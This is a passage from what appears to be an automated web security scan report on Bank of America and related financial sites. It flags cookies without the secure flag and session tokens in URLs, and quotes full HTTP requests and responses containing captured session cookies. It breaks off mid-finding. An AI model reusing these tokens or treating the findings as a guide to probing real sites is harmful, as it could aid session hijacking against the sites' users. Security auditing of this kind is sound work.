Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:48 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000HFr9VVqs6DZvnB1LrBiUHIT:12qb4k93q; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...

9.35. https://www.bankofamerica.com/search/Search.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /search/Search.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/Search.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:49 GMT
Content-length: 0
Location: https://www6.bankofamerica.com/search/Search.do
Content-language: en-US
Set-cookie: JSESSIONID=0000xbRy8_ejvIwVZwAv3xumRzj:13ihk3qeh; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


9.36. https://www.bankofamerica.com/smallbusiness/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /smallbusiness/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:46:04 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000RP8_STCkOcHUGUzx8ITXdFM:12rfueg3b; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descript
...[SNIP]...

9.37. https://www.bankofamerica.com/www/en_US/global/hs_home/stylesheets/home_win_ns6.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/global/hs_home/stylesheets/home_win_ns6.css

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/global/hs_home/stylesheets/home_win_ns6.css HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:53 GMT
Content-type: text/css
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:53 GMT
Last-modified: Tue, 25 Nov 2008 19:59:27 GMT
Etag: "99e-492c591f"
Accept-ranges: bytes
Content-Length: 12756

.h3-whitetext {
   DISPLAY: inline; FONT-SIZE: 75%; COLOR: #FFFFFF; PADDING-TOP: 18px; FONT-FAMILY: Verdana;
   font-weight: bold
}

.h3-graytext {
   DISPLAY: inline; FONT-SIZE: 75%; COLOR: #333333;
...[SNIP]...

9.38. https://www.bankofamerica.com/www/en_US/global/js/masthead.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/global/js/masthead.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/global/js/masthead.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:55 GMT
Content-type: application/x-javascript
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:55 GMT
Last-modified: Wed, 21 Jan 2009 15:42:02 GMT
Etag: "2aa-4977424a"
Accept-ranges: bytes
Content-Length: 1606

function submit_search(){ document.SiteSearchForm.submit(); }

function bt_rollover(ref, classRef) { eval(ref).className = classRef; }

function create_button(text, href, css_class, onclick_evt,
...[SNIP]...

9.39. https://www.bankofamerica.com/www/en_US/js/search/jquery-1.2.6.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/js/search/jquery-1.2.6.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/js/search/jquery-1.2.6.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:59 GMT
Content-type: application/x-javascript
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:59 GMT
Last-modified: Wed, 21 Jan 2009 15:45:14 GMT
Etag: "3d2e-4977430a"
Accept-ranges: bytes
Content-Length: 31043

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 20
...[SNIP]...

9.40. https://www.bankofamerica.com/www/en_US/js/search/search-lite.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/js/search/search-lite.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/js/search/search-lite.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:02 GMT
Content-type: application/x-javascript
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:24:02 GMT
Last-modified: Thu, 23 Apr 2009 13:34:52 GMT
Etag: "4be-49f06e7c"
Accept-ranges: bytes
Content-Length: 3881

// Search Autocomplete routines.
// updated: 2009.04.02
// English

var search_box_default = "Enter keyword(s)";
var search_box_prompt = "You must enter a keyword before clicking on Search button
...[SNIP]...

9.41. https://www.bankofamerica.com/www/global/js/tc_logging.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/global/js/tc_logging.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/global/js/tc_logging.js? HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/homepage/overview.go
Cache-Control: max-age=0
If-Modified-Since: Wed, 01 Aug 2007 17:46:04 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
If-None-Match: "2f30-46b0c6dc"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35; cmTPSet=Y; state=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US

Response

HTTP/1.1 304 Use local copy
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:59 GMT
Etag: "2f30-46b0c6dc"
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:24:59 GMT


9.42. https://www.fs.ustrust.com/login/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fs.ustrust.com
Path:   /login/login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login.aspx?sgt=1 HTTP/1.1
Host: www.fs.ustrust.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
geh-svr-hex: 3D2F794B
Set-Cookie: Bear=HdC5r0QnFpMuvDTYknZMKN4FD4TbXTCUXG9mmgSSpfc=; domain=.fs.ustrust.com; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 79822


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head lang="en-us"><met
...[SNIP]...

9.43. https://www.merrilledge.com/m/pages/home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=jLP3XoAxGsv1v6MwPZhahlP/aoO3xH/srhMcrJj795J+eDNFXiPfjzck1kD4CBi+6ie4KrwamlTHaXTZUdECRzrFky9gNvwqK2gfsTdEDm7sAur5XVP4PPYin3ZpmEGZhp4U9tI/R2PBhf10C0GUszchafmuD9bl4ok1Tou4xpWvp8+gJofMVxln5UHKDCa81PkeNNVr9tnGgUbb8xfUqJ9mQ+4UmQUBAvTOqlILImkN5L5gXWD34cRgwFSZ2KnJ3H2WELiFxhYRFU/W8/5hb7Ab0vdhSiKgU1mzlw6G++AaFuJs+7z65oKRdeBCqK0hIz3tim19s96RERtkf9rfjHj+6RDI79fjrabVGOlnraDPyBxJbqaBTLfWCRw+ylCtGUKvwL6+os3qLez4GsDok2Qd+n4qvsQdjjUilaWTMSP27nak6lbRwCk4b/M4No0d4wzcrSvMyENoATzMp8aftIfSjmRgRvGUNASAKrTSpR5rfw6e36o6v3gAJa9Ivvp8bVC7cNorr2VzTikkqJI1i1lWvbV9SNzGVXk61fudxdZpjJjPAMIp9cah6rKP6ckESa6k8l1TR7oiXNRlH9EEi7eiYAWvwxgHlp0pcxiP0RMD9/1rRGHkXk3lzz8V7861; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=341ce30bc7594740a1c8d88f714e0605; domain=.merrilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

10. Session token in URL
There are 4 instances of this issue:


10.1. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=f628c2a0-5de5-4ec1-857e-849881b01ba7&hostname=www.tenable.com&location=%2Fservices%2Fnessus-perimeter-service&url=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&sessionID=1303775069685.44375&fpc=ece3cfc-12f8f0cc5fa-d0c182-1&ts1303775074502.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 25 Apr 2011 23:45:19 GMT
Connection: keep-alive


10.2. https://www.bankofamerica.com/credit-cards/cardoverview.action

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /credit-cards/cardoverview.action

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /credit-cards/cardoverview.action?context_id=overview_page HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:47 GMT
Content-type: text/html;charset=UTF-8
Set-Cookie: SMIDENTITY=gR5vcd2T/9Pc8ggsnVIGFH2qS8UPe2InnEOKagmWCynRXczda87F4qQCcxXuFUHUslSW1KHy/MNQvuu5a0LFHQ+Yb+bXZGJG4jTdlo9tzaaaKPx3Pagvvtj1nZrTvP4C46pkodCH4CDcB/3rGd3UgOWOSL4lcJfCqsncm1lYr6e/ggBvgbwAsg3ni4IblWDlcCFGxK6jvqACOjfn31o65GuqLQK0WtCQcW/tfxLNdLJ638dCE54AhZ4CJ6m42FeUmuFs2SXlyGiAzf+yLMGl+4hznDezzrBb/w3+N6PBIomj/sT2UCohDEmUTPyi/ZkV4wm9V+sBOUDySiXavKZak292O/W0gh9tk4PU4ZYiGNpxKH6gw9tMSXhsc9r7Zp5pMJQd8kUkt6VJnO6g2Ef2bEAraf+WGZI5kQorViWkIFPPu+x0DweCzY+yWJ5folKswk4G/dYJP9N2U6ybWc8jHuQ6r20V37uYeqO878kY4Zp47DVGcyRzQZ4guLBaha65; path=/; domain=.bankofamerica.com; secure
Content-language: en-US
Set-cookie: JSESSIONID=0000zX4AQQUcvRQK0iSsbAUjzzb:12qb4k7c1; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="EN">
   <head>
       <link href="/www/en_US/stylesheet/cardsearch/creditcards_style.css" type="text/css"
   rel="styles
...[SNIP]...
<noscript>
    <iframe src="https://sitekey.bankofamerica.com/sas/sitekeyWidgetScript.do?nojs=true&gcsl_token...[SNIP]...source=BOFA-CAP&gcsl_iv=F96D3BF5877F7949" height="200" width="250" frameborder=0 scrolling=no>
   </iframe>
...[SNIP]...

10.3. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_03_0_900294&sId=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
